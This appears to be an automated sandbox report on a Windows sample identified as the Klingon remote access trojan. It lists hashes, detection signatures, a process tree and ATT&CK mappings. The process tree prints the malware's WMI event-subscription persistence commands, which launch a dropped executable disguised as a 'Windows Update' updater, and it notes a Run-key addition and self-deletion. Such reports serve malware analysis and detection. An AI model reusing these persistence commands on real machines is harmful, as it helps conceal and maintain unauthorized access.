Analysis

  • max time kernel
    146s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-06-2021 07:27

General

  • Target

    c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe

  • Size

    3.1MB

  • MD5

    14471a353788bb6cdb6071d0e0a83004

  • SHA1

    c90b5c534ce0d622547bc5b96075eb3d4212d660

  • SHA256

    c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349

  • SHA512

    57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8

Malware Config

Signatures

  • Klingon

    Klingon is a remote access trojan written in Golang with various capabilities.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
    "C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Windows\system32\cmd.exe
      cmd /C start "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Users\Admin\AppData\Local\Windows Update\updater10.exe
        "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"
        3⤵
        • Executes dropped EXE
        • Deletes itself
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\System32\Wbem\wmic.exe
          wmic process get Caption,ParentProcessId,ProcessId
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4060
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe ver
          4⤵
          PID:3684
        • C:\Windows\system32\cmd.exe
          cmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2104
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4040
        • C:\Windows\system32\cmd.exe
          cmd /C "wmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:636
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'
            5⤵
            PID:1484
        • C:\Windows\system32\cmd.exe
          cmd /C "wmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')
            5⤵
            PID:3784
        • C:\Windows\System32\Wbem\wmic.exe
          wmic process get Caption,ParentProcessId,ProcessId
          4⤵
          PID:1872
        • C:\Windows\system32\cmd.exe
          cmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''
            5⤵
            PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    Registry Run Keys / Startup Folder: T1060 (1)
  • Defense Evasion
    Modify Registry: T1112 (1)

Downloads

  • C:\Users\Admin\AppData\Local\Windows Update\updater10.exe
    MD5

    14471a353788bb6cdb6071d0e0a83004

    SHA1

    c90b5c534ce0d622547bc5b96075eb3d4212d660

    SHA256

    c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349

    SHA512

    57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8

  • memory/636-122-0x0000000000000000-mapping.dmp
  • memory/1484-123-0x0000000000000000-mapping.dmp
  • memory/1484-114-0x0000000000000000-mapping.dmp
  • memory/1804-127-0x0000000000000000-mapping.dmp
  • memory/1872-126-0x0000000000000000-mapping.dmp
  • memory/2104-120-0x0000000000000000-mapping.dmp
  • memory/2268-124-0x0000000000000000-mapping.dmp
  • memory/2340-115-0x0000000000000000-mapping.dmp
  • memory/3684-119-0x0000000000000000-mapping.dmp
  • memory/3784-125-0x0000000000000000-mapping.dmp
  • memory/4040-121-0x0000000000000000-mapping.dmp
  • memory/4060-118-0x0000000000000000-mapping.dmp
  • memory/4060-128-0x0000000000000000-mapping.dmp